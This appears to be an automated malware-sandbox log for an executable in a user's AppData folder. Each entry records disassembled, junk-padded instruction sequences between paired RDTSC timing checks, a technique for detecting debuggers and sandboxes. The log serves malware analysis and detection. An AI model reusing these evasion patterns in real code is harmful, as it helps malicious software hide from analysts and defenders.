Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5AFEE8 second address: 5AFF6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d jc 00007F2738B89E0Ch 0x00000013 mov edx, dword ptr [ebp+1253964Fh] 0x00000019 sub edx, 6D67476Ah 0x0000001f push dword ptr [ebp+122D3375h] 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007F2738B89E08h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 0000001Dh 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f sub dh, 0000004Eh 0x00000042 sbb dx, 9C78h 0x00000047 push 92E49B26h 0x0000004c pushad 0x0000004d push edi 0x0000004e jmp 00007F2738B89E10h 0x00000053 pop edi 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F2738B89E0Bh 0x0000005b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5B1105 second address: 5B1109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5B2BFA second address: 5B2C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5B2C04 second address: 5B2C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5B2C0C second address: 5B2C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 js 00007F2738B89E0Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5B460F second address: 5B4646 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2738E98EECh 0x0000000f pushad 0x00000010 pushad 0x00000011 jnl 00007F2738E98EE6h 0x00000017 jmp 00007F2738E98EF5h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5B4646 second address: 5B4650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40E74 second address: 4A40EBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2738E98EEEh 0x0000000f push eax 0x00000010 jmp 00007F2738E98EEBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2738E98EF5h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40EBC second address: 4A40F16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007F2738B89E13h 0x0000000c add cx, 8DAEh 0x00000011 jmp 00007F2738B89E19h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F2738B89E18h 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40F16 second address: 4A40F1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40F1C second address: 4A40F22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40F22 second address: 4A40F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30DD0 second address: 4A30E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 pushfd 0x00000006 jmp 00007F2738B89E0Bh 0x0000000b add si, E45Eh 0x00000010 jmp 00007F2738B89E19h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30E0A second address: 4A30E1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30E1D second address: 4A30E71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2738B89E0Fh 0x00000008 pushfd 0x00000009 jmp 00007F2738B89E18h 0x0000000e add cl, FFFFFFE8h 0x00000011 jmp 00007F2738B89E0Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2738B89E14h 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30E71 second address: 4A30E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30E77 second address: 4A30E90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b mov ebx, 3A39B778h 0x00000010 mov bx, D324h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov esi, edi 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A80011 second address: 4A80017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A80017 second address: 4A8005F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov si, 878Bh 0x00000011 mov ebx, ecx 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 push edx 0x00000017 mov bh, ch 0x00000019 pop edi 0x0000001a mov di, si 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2738B89E19h 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A8005F second address: 4A80091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov ah, 57h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F2738E98EECh 0x00000016 or esi, 167B9858h 0x0000001c jmp 00007F2738E98EEBh 0x00000021 popfd 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A80091 second address: 4A800BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F2738B89E0Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2738B89E15h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A100B9 second address: 4A1011F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e pushfd 0x0000000f jmp 00007F2738E98EF3h 0x00000014 adc ax, 6B0Eh 0x00000019 jmp 00007F2738E98EF9h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F2738E98EEDh 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A1011F second address: 4A1018C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2738B89E17h 0x00000009 adc eax, 031AD5CEh 0x0000000f jmp 00007F2738B89E19h 0x00000014 popfd 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov dx, cx 0x00000023 pushfd 0x00000024 jmp 00007F2738B89E10h 0x00000029 and esi, 76EB3178h 0x0000002f jmp 00007F2738B89E0Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A1018C second address: 4A101B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dx, DDEEh 0x00000013 mov edi, 7E9CEAFAh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10215 second address: 4A10230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10230 second address: 4A10237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, dh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10237 second address: 4A1023D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A1023D second address: 4A10241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10241 second address: 4A10245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30B52 second address: 4A30B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, EBh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30B6E second address: 4A30BAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2738B89E19h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2738B89E0Dh 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30BAF second address: 4A30BDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, dx 0x00000011 jmp 00007F2738E98EEFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30BDC second address: 4A30C00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30C00 second address: 4A30C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30C04 second address: 4A30C17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30C17 second address: 4A30C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738E98EF4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30649 second address: 4A3068A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F2738B89E10h 0x0000000b jmp 00007F2738B89E15h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 pushad 0x00000016 mov di, 6162h 0x0000001a mov di, 31AEh 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A3068A second address: 4A3068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A3068E second address: 4A30692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30692 second address: 4A30698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A401DA second address: 4A40283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F2738B89E0Eh 0x0000000c xor ax, C158h 0x00000011 jmp 00007F2738B89E0Bh 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a movzx ecx, di 0x0000001d jmp 00007F2738B89E11h 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007F2738B89E11h 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F2738B89E13h 0x00000033 xor al, 0000002Eh 0x00000036 jmp 00007F2738B89E19h 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F2738B89E10h 0x00000042 sbb esi, 182267A8h 0x00000048 jmp 00007F2738B89E0Bh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40283 second address: 4A402B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2738E98EEDh 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A402B1 second address: 4A402CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 88h 0x00000005 mov esi, 2B1D8F6Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2738B89E0Ch 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A402CF second address: 4A402D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A402D5 second address: 4A402E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E0Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A402E6 second address: 4A402EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A70EBF second address: 4A70F0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2738B89E0Eh 0x0000000f push eax 0x00000010 jmp 00007F2738B89E0Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F2738B89E16h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A70F0E second address: 4A70F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A70F12 second address: 4A70F2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A70F2F second address: 4A70F6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2738E98EF7h 0x00000008 pop esi 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2738E98EF7h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30556 second address: 4A3055C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A3055C second address: 4A30560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30560 second address: 4A305C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2738B89E14h 0x00000013 and al, 00000058h 0x00000016 jmp 00007F2738B89E0Bh 0x0000001b popfd 0x0000001c call 00007F2738B89E18h 0x00000021 mov edi, esi 0x00000023 pop esi 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007F2738B89E0Ch 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A305C7 second address: 4A305CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A305CB second address: 4A305D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A305D1 second address: 4A305D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A305D7 second address: 4A305DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A305DB second address: 4A305F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bl, D7h 0x00000012 push eax 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40D9A second address: 4A40DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40DA0 second address: 4A40DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40DA4 second address: 4A40DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F2738B89E10h 0x0000000e push eax 0x0000000f jmp 00007F2738B89E0Bh 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F2738B89E16h 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F2738B89E17h 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40DFB second address: 4A40E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40E01 second address: 4A40E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40E05 second address: 4A40E1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40E1D second address: 4A40E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A40E23 second address: 4A40E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738E98EF9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A50140 second address: 4A50144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A50144 second address: 4A50161 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A50161 second address: 4A50171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E0Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A50171 second address: 4A50175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A50175 second address: 4A501A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F2738B89E0Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2738B89E17h 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A501A6 second address: 4A501DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, 160D199Eh 0x00000013 jmp 00007F2738E98EEFh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A501DD second address: 4A50200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A50200 second address: 4A50207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 24h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A50207 second address: 4A5020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A5020D second address: 4A50211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
